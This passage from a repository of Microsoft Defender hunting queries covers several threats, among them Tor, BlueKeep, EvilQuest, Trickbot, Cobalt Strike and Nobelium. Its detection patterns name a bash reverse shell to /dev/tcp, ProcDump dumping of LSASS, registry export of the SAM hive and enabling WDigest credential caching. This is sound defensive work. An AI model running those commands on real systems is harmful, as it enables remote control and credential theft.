[Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md) ## Contributor info **Contributor:** Stefan Sellmer **GitHub alias:** @stesell **Organization:** Microsoft 365 Defender **Contact info:** stesell@microsoft.com ================================================ FILE: Command and Control/Tor.txt ================================================ // This query looks for Tor client, or for a common Tor plugin called Meek. // We query for active Tor connections, but could have alternatively looked for active Tor runs (ProcessCreateEvents) or Tor downloads (DeviceFileEvents) // To read more about this technique, see: // Tor: https://attack.mitre.org/wiki/Software/S0183#Techniques_Used // Meek plugin: https://attack.mitre.org/wiki/Software/S0175 // Multi-hop proxy technique: https://attack.mitre.org/wiki/Technique/T1188 // Tags: #Tor, #MultiHopProxy, #CnC DeviceNetworkEvents | where Timestamp < ago(3d) and InitiatingProcessFileName in~ ("tor.exe", "meek-client.exe") // Returns MD5 hashes of files used by Tor, to enable you to block them. // We count how prevalent each file is (by machines) and show examples for some of them (up to 5 machine names per hash). | summarize MachineCount=dcount(DeviceName), MachineNames=makeset(DeviceName, 5) by InitiatingProcessMD5 | order by MachineCount desc ================================================ FILE: Command and Control/c2-bluekeep.md ================================================ # Detect command-and-control communication related to BlueKeep cryptomining This query was originally published in the threat analytics report, *Exploitation of CVE-2019-0708 (BlueKeep)*. [CVE-2019-0708](https://nvd.nist.gov/vuln/detail/CVE-2019-0708), also known as BlueKeep, is a critical remote code execution vulnerability involving RDP. Soon after its disclosure, the NSA issued a rare [advisory](https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/1865726/nsa-cybersecurity-advisory-patch-remote-desktop-services-on-legacy-versions-of/) about this vulnerability, out of concern that it could be used to quickly spread malware. Attackers have since used this vulnerability to [install cryptocurrency miners](https://www.wired.com/story/bluekeep-hacking-cryptocurrency-mining/) on targets. Microsoft has issued [updates](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708) for this vulnerability, as well as [guidance](https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708) for protecting operating systems that we no longer support. Microsoft Defender ATP also contains [behavioral detections](https://www.microsoft.com/security/blog/2019/11/07/the-new-cve-2019-0708-rdp-exploit-attacks-explained/) for defending against this threat. The following query locates devices that have communicated with attacker infrastructure associated with BlueKeep-related cryptomining. ## Query ```Kusto // Suggest setting Timestamp starting from September 6th // when the BlueKeep Metasploit module was released let IPs = pack_array("109.176.117.11", "5.100.251.106", "217.23.5.20", "5.135.199.19"); DeviceNetworkEvents | where Timestamp > ago(7d) | where RemoteIP in(IPs) ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | v | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Detect BlueKeep-related mining](../Execution/detect-bluekeep-related-mining.md) * [Detect BlueKeep exploitation attempts](../Initial%20access/detect-bluekeep-exploitation-attempts.md) * [Detect suspicious RDP activity related to BlueKeep](..\Lateral%20Movement\detect-suspicious-rdp-connections.md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Command and Control/check-for-shadowhammer-activity-download-domain.md ================================================ # Check for ShadowHammer-related download activity This query was originally published in the threat analytics report, *ShadowHammer supply chain attack* [Operation ShadowHammer](https://www.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers) was an attack against ASUS computer hardware, using the company's own update infrastructure to deliver malware to the company's products. The campaign ran from June to November, 2018. ASUS has since [responded](https://www.asus.com/News/hqfgVUyZ6uyAyJe1) with updates that protect their Live Update system, and diagnostic tools to check affected systems. The following query checks for activity associated with the ShadowHammer download domain over the past 30 days. ## Query ``` DeviceNetworkEvents | where Timestamp > ago(30d) | where RemoteUrl == "asushotfix.com" or RemoteIP == "141.105.71.116" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | v | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Command and Control/python-use-by-ransomware-macos.md ================================================ # Python usage associated with ransomware on macOS This query was originally published in the threat analytics report, *EvilQuest signals the rise of Mac ransomware*. As of the time of this writing (October 2020), ransomware designed to target macOS is relatively rare. EvilQuest is one of the few examples of this kind of malware on the platform. The query below can help locate an attempt to run Python in service of malicious activity by a remote operator. The command the query searches for is associated with, but not definitely indicative of, EvilQuest infections. Other queries related to EvilQuest ransomware can be found under the [See also](#see-also) section below. ## Query ```kusto union DeviceFileEvents, DeviceProcessEvents | where Timestamp >= ago(7d) | where ProcessCommandLine contains "EIKKEIKK" and ProcessCommandLine contains "python" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | v | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Ransom note 'say' alert associated with ransomware on macOS](..\Impact\ransom-note-creation-macos.md) * [Launching questd ransomware using osascript](..\Execution\launch-questd-w-osascript.md) * [Reverse shell associated with ransomware on macOS](reverse-shell-ransomware-macos.md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Command and Control/recon-with-rundll.md ================================================ # Detect rundll.exe being used for reconnaissance and command-and-control This query was originally published in the threat analytics report, *Trickbot: Pervasive & underestimated*. [Trickbot](https://attack.mitre.org/software/S0266/) is a very prevalent piece of malware with an array of malicious capabilities. Originally designed to steal banking credentials, it has since evolved into a modular trojan that can deploy other malware, disable security software, and perform command and control (C2) operations. Trickbot operators are known to use the legitimate Windows process *rundll.exe* to perform malicious activities, such as reconnaissance. Once a target is infected, the operator will drop a batch file that runs several commands and connects to a C2 server for further action. The following query detects suspicious rundll.exe activity associated with Trickbot campaigns. See [Office applications launching wscript.exe to run JScript](../Execution/office-apps-launching-wscipt.md) for another query related to Trickbot activity. ## Query ```Kusto DeviceNetworkEvents | where InitiatingProcessFileName =~ "rundll32.exe" // Empty command line | where InitiatingProcessCommandLine has "rundll32.exe" and InitiatingProcessCommandLine !contains " " and InitiatingProcessCommandLine != "" | summarize DestinationIPCount = dcount(RemoteIP), make_set(RemoteIP), make_set(RemoteUrl), make_set(RemotePort) by InitiatingProcessCommandLine, DeviceId, bin(Timestamp, 5m) ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | v | | | Lateral movement | | | | Collection | v | | | Command and control | v | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Command and Control/reverse-shell-ransomware-macos.md ================================================ # Reverse shell associated with ransomware on macOS This query was originally published in the threat analytics report, *EvilQuest signals the rise of Mac ransomware*. As of the time of this writing (October 2020), ransomware designed to target macOS is relatively rare. EvilQuest is one of the few examples of this kind of malware on the platform. The query below can help locate a reverse shell established by an attacker. The command the query searches for is associated with, but not definitely indicative of, EvilQuest infections. Other queries related to EvilQuest ransomware can be found under the [See also](#see-also) section below. ## Query ```kusto union DeviceFileEvents, DeviceProcessEvents | where Timestamp >= ago(7d) | where ProcessCommandLine has "bash -i >& /dev/tcp/" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | v | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Ransom note 'say' alert associated with ransomware on macOS](..\Impact\ransom-note-creation-macos.md) * [Launching questd ransomware using osascript](..\Execution\launch-questd-w-osascript.md) * [Python usage associated with ransomware on macOS](python-use-by-ransomware-macos.md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Credential Access/Active Directory Sensitive Group Modifications.md ================================================ # Active Directory Sensitive/Tier 0 Group Modifications This query shows all modifications to highly sensitive active directory groups (also known as Tier 0). An example of these groups include Domain Admins, Schema Admins and Enterprise Admins. More info can be found here: https://docs.microsoft.com/en-us/security/compass/privileged-access-access-model#evolution-from-the-legacy-ad-tier-model https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in-active-directory This advanced hunting query requires Defender for Identity be deployed due to it's reliance on the IdentityDirectoryEvents table. ## Query ``` // Detects changes in Tier 0 group memberships // Command leverages MDI schema // Execute from https://security.microsoft.com or through the M365D advanced hunting API let Events = materialize ( IdentityDirectoryEvents | where ActionType == 'Group Membership changed' | extend ActivityType = iff(isnotempty(tostring(AdditionalFields['TO.GROUP'])),"Added Account", "Removed Account") | where isnotempty(AccountSid) ); let Tier0Adds = ( Events | where ActivityType == "Added Account" | extend TargetGroup = tostring(AdditionalFields['TO.GROUP']) | extend TargetObject = iff(isempty(tostring(AdditionalFields['TARGET_OBJECT.USER'])), tostring(AdditionalFields['TARGET_OBJECT.GROUP']), tostring(AdditionalFields['TARGET_OBJECT.USER'])) | extend TargetType = iff(isempty(tostring(AdditionalFields['TARGET_OBJECT.USER'])), "Security Group", "User Account") //| extend TargetObject = AdditionalFields['TARGET_OBJECT.USER'] ); let Tier0Removes = ( Events | where ActivityType == "Removed Account" | extend TargetGroup = tostring(AdditionalFields['FROM.GROUP']) | extend TargetObject = iff(isempty(tostring(AdditionalFields['TARGET_OBJECT.USER'])),tostring(AdditionalFields['TARGET_OBJECT.GROUP']), tostring(AdditionalFields['TARGET_OBJECT.USER'])) | extend TargetType = iff(isempty(tostring(AdditionalFields['TARGET_OBJECT.USER'])), "Security Group", "User Account") ); let Tier0Groups = datatable(TargetGroup:string) [ 'Enterprise Admins', 'Domain Admin', 'Domain Controllers' 'Administrators', 'Enterprise Key Admins', 'Account Operators', 'Organization Management', 'Backup Operators', 'RTCDomainServerAdmins', 'ENTERPRISE DOMAIN CONTROLLERS', 'Cert Publishers', 'Schema Admins', 'DnsAdmins', 'Exchange Recipient Administrators', 'Replicator', 'Read-Only Domain Controllers', 'Print Operators' ]; Tier0Groups | join (union Tier0Adds, Tier0Removes) on TargetGroup | project Timestamp, ActionType, ActivityType,TargetType, ActorUpn=AccountUpn, TargetObject, TargetAccountUpn, TargetGroup // If you are setting up a detection rule in M365D, you'll need to add ReportId and AccountSid to the projected columns ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | V | | | Defense evasion | | | | Credential Access | V | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Dylan J **Organization:** Microsoft **Twitter:** @Dylface2 ================================================ FILE: Credential Access/Private Key Files.txt ================================================ ///////////////////////////////////////////////////////// // Private Key Files // // This query identifies file operation with files having // one of the extensions commonly used to save a private // key. The risk is that if an attacker were to obtain // the file, they could brute force any password on it // and potentially obtain a powerful certificate. To do // this, they would only need to obtain read access to // the file. // // The risk associated with these files is heavily // determined by the value of the certificate. For example, // loss of a self-signed certificate created by Adobe Acrobat // is significantly less impactful than loss of a website // SSL certificate. // // Recommendation: Know where these files are, and if possible // back them up and remove them. You might also consider // creating an informational alert. ////////////////////////////////////////////////////////////// DeviceFileEvents | where Timestamp > ago(7d) | where FileName endswith '.pfx' or FileName endswith '.pfn' or FileName endswith '.p12' ================================================ FILE: Credential Access/cobalt-strike.md ================================================ # Find user accounts potentially affected by Cobalt Strike This query was originally published in the threat analytics report, *Ransomware continues to hit healthcare, critical services*. There is also a related [blog](https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/). In April of 2020, security researchers observed multiple ransomware campaigns using the same set of techniques. The attackers would compromise a web-facing endpoint and employ tools such as Cobalt Strike to steal users' credentials. [Cobalt Strike](https://www.cobaltstrike.com/) is commercial software used to conduct simulated threat campaigns against a target; however, malicious actors also use Cobalt Strike in real attacks. The software has a large range of [capabilities](https://attack.mitre.org/software/S0154/), including credential theft. The following query identifies accounts that have logged on to compromised endpoints and have potentially had their credentials stolen. > [!IMPORTANT] > This query can only check endpoints onboarded to Microsoft Defender ATP. > > ​If you've identified affected endpoints that have not onboarded to Microsoft Defender ATP, check the Windows Event Log for post-compromise logons—those that occur during or after the earliest suspected breach activity—with event ID *4624* and logon type *2* or *10*. For any other timeframe, check for logon type *4* or *5*. ## Query ```Kusto // Check for specific alerts AlertInfo // Attempts to clear security event logs. | where Title in("Event log was cleared", // List alerts flagging attempts to delete backup files. "File backups were deleted", // Potential Cobalt Strike activity - Note that other threat activity can also //trigger alerts for suspicious decoded content "Suspicious decoded content", // Cobalt Strike activity "\'Atosev\' malware was detected", "\'Ploty\' malware was detected", "\'Bynoco\' malware was detected") | extend AlertTime = Timestamp | join AlertEvidence on AlertId | distinct DeviceName, AlertTime, AlertId, Title | join DeviceLogonEvents on $left.DeviceName == $right.DeviceName // Creating 10 day Window surrounding alert activity | where Timestamp < AlertTime +5d and Timestamp > AlertTime - 5d // Projecting specific columns | project Title, DeviceName, DeviceId, Timestamp, LogonType, AccountDomain, AccountName, AccountSid, AlertTime, AlertId, RemoteIP, RemoteDeviceName ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | v | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | v | Attackers will not only dump credentials for accounts that have logged on to interactive or RDP sessions, but will also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry. | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | v | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Credential Access/doppelpaymer-procdump.md ================================================ # Detect DoppelPaymer operators dumping credentials with ProcDump This query was originally published in the threat analytics report, *Doppelpaymer: More human-operated ransomware*. There is also a related [blog](https://msrc-blog.microsoft.com/2019/11/20/customer-guidance-for-the-dopplepaymer-ransomware/). [DoppelPaymer](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/DoppelPaymer!MTB&threatId=-2147205372) is ransomware that is spread manually by human operators. These operators have exhibited extensive knowledge of system administration and common network security misconfigurations. For example, they use SysInternal utilities such as [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) to dump credentials from [LSASS](https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection). They often use these stolen credentials to turn off security software, run malicious commands, and spread malware throughout an organization. The following query detects ProcDump being used to dump credentials from LSASS. The [See also](#See-also) section below lists links to other queries associated with DoppelPaymer. ## Query ```Kusto // Dumping of LSASS memory using procdump DeviceProcessEvents | where Timestamp > ago(7d) // Command lines that include "lsass" and -accepteula or -ma flags used in procdump | where (ProcessCommandLine has "lsass" and (ProcessCommandLine has "-accepteula" or ProcessCommandLine contains "-ma")) // Omits possible FPs where the full command is just "procdump.exe lsass" or (FileName in~ ('procdump.exe','procdump64.exe') and ProcessCommandLine has 'lsass') ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | v | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Detect DoppelPaymer performing reconnaissance with net.exe](../Discovery/doppelpaymer.md) * [Detect DoppelPaymer operators spreading files with PsExec](../Lateral%20Movement/doppelpaymer-psexec.md) * [Detect DoppelPaymer operators stopping services](../Defense%20evasion/doppelpaymer-stop-services.md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Credential Access/identify-accounts-logged-on-to-endpoints-affected-by-cobalt-strike.md ================================================ # Identify accounts that have logged on to endpoints affected by Cobalt Strike This query was originally published in the threat analytics report, *Ransomware continues to hit healthcare, critical services*. It finds all user accounts that have logged on to an endpoint affected by [Cobalt Strike](https://attack.mitre.org/software/S0154/), a penetration tool. Assume that all credentials on endpoints affected by Cobalt Strike were available to attackers and that all associated accounts are compromised. Note that attackers will not only dump credentials for accounts that have logged on to interactive or RDP sessions, but will also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry. ## Query ```Kusto // Check for specific alerts AlertInfo // This checks over the previous 7 days -- alter Timestamp value for other periods | where Timestamp > ago(7d) // Attempts to clear security event logs. | where Title in("Event log was cleared", // List alerts flagging attempts to delete backup files. "File backups were deleted", // Potential Cobalt Strike activity - Note that other threat activity can also trigger alerts for suspicious decoded content "Suspicious decoded content", // Cobalt Strike activity "\'Atosev\' malware was detected", "\'Bynoco\' malware was detected", "\'Cosipor\' malware was detected") | extend AlertTime = Timestamp | join AlertEvidence on AlertId | project DeviceId, AlertTime, AlertId, Title | join DeviceLogonEvents on DeviceId // Creating 10 day Window surrounding alert activity | where Timestamp < AlertTime +5d and Timestamp > AlertTime - 5d // Projecting specific columns | project Title, DeviceName, DeviceId, Timestamp, LogonType, AccountDomain, AccountName, AccountSid, AlertTime, AlertId, RemoteIP, RemoteDeviceName ``` ## Category This query can be used the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | v | If you've identified affected endpoints that have not onboarded to Microsoft Defender ATP, check the Windows Event Log for post-compromise logons — those that occur after or during the earliest suspected breach activity — with *event ID 4624* and *logon type 2* or *10*. For any other timeframe, check for *logon type 4* or *5*. | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Credential Access/lazagne.md ================================================ # Detect credential theft via SAM database export by LaZagne This query was originally published in the threat analytics report, *Ryuk ransomware*. There is also a related [blog](https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/). [Ryuk](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Ryuk&threatId=-2147232689) is human-operated ransomware. Much like [DoppelPaymer](https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/) ransomware, Ryuk is spread manually, often on networks that are already infected with Trickbot. During a typical Ryuk campaign, an operator will use [LaZagne](https://github.com/AlessandroZ/LaZagne), a credential theft tool, to access stored passwords for service accounts. The accounts are then used to jump from desktop clients to servers or domain controllers, allowing for better reconnaissance, faster movement, and a more severe impact on the target. The following query detects credential theft by LaZagne. The [See also](#See-also) section below lists links to other queries associated with Ryuk ransomware. ## Query ```Kusto // Find credential theft via SAM database export by LaZagne DeviceProcessEvents | where Timestamp > ago(7d) | where FileName =~ 'reg.exe' and ProcessCommandLine has 'save' and ProcessCommandLine has 'hklm' and ProcessCommandLine has 'sam' | project DeviceId, Timestamp, InitiatingProcessId, InitiatingProcessFileName, ProcessId, FileName, ProcessCommandLine ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | v | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Detect PsExec being used to spread files](../Lateral%20Movement/remote-file-creation-with-psexec.md) * [Detect Cobalt Strike invoked via WMI](../Campaigns/cobalt-strike-invoked-w-wmi.md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Credential Access/logon-attempts-after-malicious-email.md ================================================ # Logon attempts after receipt of malicious email This query finds the 10 latest logons performed by email recipients within 30 minutes after they received known malicious emails. You can use this query to check whether the accounts of the email recipients have been compromised. ## Query ``` //Find logons that occurred right after malicious email was received let MaliciousEmail=EmailEvents | where ThreatTypes has_cs "Malware" | project TimeEmail = Timestamp, Subject, SenderFromAddress, AccountName = tostring(split(RecipientEmailAddress, "@")[0]); MaliciousEmail | join ( IdentityLogonEvents | project LogonTime = Timestamp, AccountName, DeviceName ) on AccountName | where (LogonTime - TimeEmail) between (0min.. 30min) | take 10 ``` ## Category This query can be used the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | v | Logon attempts after receipt of malicious email can indicate account is compromised or being compromised | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Credential Access/procdump-lsass-credentials.md ================================================ # Procdump dumping LSASS credentials This query was originally published in the threat analytics report, "Exchange Server zero-days exploited in the wild". In early March 2021, Microsoft released [patches](https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/) for four different zero-day vulnerabilities affecting Microsoft Exchange Server. The vulnerabilities were being used in a coordinated attack. For more information on the vulnerabilities, visit the following links: * [CVE-2021-26855](https://nvd.nist.gov/vuln/detail/CVE-2021-26855) * [CVE-2021-26857](https://nvd.nist.gov/vuln/detail/CVE-2021-26857) * [CVE-2021-26858](https://nvd.nist.gov/vuln/detail/CVE-2021-26858) * [CVE-2021-27065](https://nvd.nist.gov/vuln/detail/CVE-2021-27065) The following query looks for evidence of Procdump being used to dump credentials from LSASS, the Local Security Authentication Server. This might indicate an attacker has compromised user accounts. More queries related to this threat can be found under the [See also](#See-also) section of this page. ## Query ```Kusto DeviceProcessEvents | where (FileName has_any ("procdump.exe", "procdump64.exe") and ProcessCommandLine has "lsass") or // Looking for Accepteula flag or Write a dump file with all process memory (ProcessCommandLine has "lsass.exe" and (ProcessCommandLine has "-accepteula" or ProcessCommandLine contains "-ma")) ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | v | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## See also * [Reverse shell loaded using Nishang Invoke-PowerShellTcpOneLine technique](../Execution/reverse-shell-nishang.md) * [7-ZIP used by attackers to prepare data for exfiltration](../Exfiltration/7-zip-prep-for-exfiltration.md) * [Exchange PowerShell snap-in being loaded](../Exfiltration/exchange-powershell-snapin-loaded.md) * [Powercat exploitation tool downloaded](../Delivery/powercat-download.md) * [Exchange vulnerability creating web shells via UMWorkerProcess](../Execution/umworkerprocess-creating-webshell.md) * [Exchange Server IIS dropping web shells and other artifacts](../Execution/exchange-iis-worker-dropping-webshell.md) * [Exchange vulnerability launching subprocesses through UMWorkerProcess](../Execution/umworkerprocess-unusual-subprocess-activity.md) * [Base64-encoded Nishang commands for loading reverse shell](../Execution/reverse-shell-nishang-base64.md) ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Credential Access/wadhrama-credential-dump.md ================================================ # Image File Execution Options and .bat file usage in association with Wadhrama ransomware This query was originally published in the threat analytics report, *RDP ransomware persists as Wadhrama*. The ransomware known as [Wadhrama](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Wadhrama) has been used in human-operated attacks that follow a particular pattern. The attackers often use Remote Desktop Protocol (RDP) to gain initial access to a device or network, exfiltrate credentials, and maintain persistance. The following query checks for possible Wadhrama-related activity, by detecting the technique these attackers have used in the past to dump credentials. Other techniques used by the group associated with Wadhrama are listed under [See also](#see-also). ## Query ```Kusto // Find use of Image File Execution Options (IFEO) in conjunction // with a .bat file to dump credentials DeviceRegistryEvents | where Timestamp > ago(7d) | where RegistryKey has "sethc" or RegistryKey has "utilman" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | v | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | v | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Find data destruction related to Wadhrama ransomware](../Impact/wadhrama-data-destruction.md) * [Find RDP persistance attempts related to Wadhrama ransomware](../Persistence/wadhrama-ransomware.md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Credential Access/wdigest-caching.md ================================================ # Credential harvesting through WDigest cache This query was originally published in the threat analytics report, *WDigest credential harvesting*. [WDigest](https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc778868(v=ws.10)?redirectedfrom=MSDN) is a legacy authentication protocol dating from Windows XP. While still used on some corporate networks, this protocol can be manipulated by attackers to dump system credentials. The Microsoft Security Response Center published an [overview](https://msrc-blog.microsoft.com/2014/06/05/an-overview-of-kb2871997/) of [KB2871997](https://www.catalog.update.microsoft.com/Search.aspx?q=KB2871997), which addresses WDigest use on older platforms. More recent versions of Windows can be protected with a holistic security approach that follows the [principle of least privilege](https://docs.microsoft.com/windows-server/identity/ad-ds/plan/security-best-practices/implementing-least-privilege-administrative-models). The following query returns any attempts to turn WDigest credential caching on through the registry. ## Query ```Kusto ​union DeviceRegistryEvents, DeviceProcessEvents // Find attempts to turn on WDigest credential caching | where RegistryKey contains "wdigest" and RegistryValueName == "UseLogonCredential" and RegistryValueData == "1" or // Find processes created with commandlines that attempt to turn on WDigest caching ProcessCommandLine has "WDigest" and ProcessCommandLine has "UseLogonCredential" and ProcessCommandLine has "dword" and ProcessCommandLine has "1" | project Timestamp, DeviceName, PreviousRegistryValueData, RegistryKey, RegistryValueName, RegistryValueData, FileName, ProcessCommandLine, InitiatingProcessAccountName, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | v | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | v | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Defense evasion/ADFSDomainTrustMods[Nobelium].md ================================================ # Domain federation trust settings modified This query will find when federation trust settings are changed for a domain or when the domain is changed from managed to federated authentication. Results will relate to when a new Active Directory Federated Service (ADFS) TrustedRealm object, such as a signing certificate, is added. Modification to domain federation settings should be rare, so confirm the added or modified target domain/URL is legitimate administrative behavior. The actor, Nobelium, was observed modifying domain trust settings to subvert existing mechanisms and cause the domain to accept authorization tokens signed with actor-owned certificates. See [*Customer Guidance on Recent Nation-State Cyber Attacks*](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/). To understand why an authorized user may update settings for a federated domain in Office 365, Azure, or Intune, see [*Update or repair the settings of a federated domain in Office 365, Azure, or Intune*](https://docs.microsoft.com/office365/troubleshoot/active-directory/update-federated-domain-office-365). For details on security realms that accept security tokens, see the ADFS Proxy Protocol (MS-ADFSPP) specification: [*3.2.5.1.2.4 Security Realm Data*](https://docs.microsoft.com/openspecs/windows_protocols/ms-adfspp/e7b9ea73-1980-4318-96a6-da559486664b). For further information on AuditLogs, please see [*Azure AD audit activity 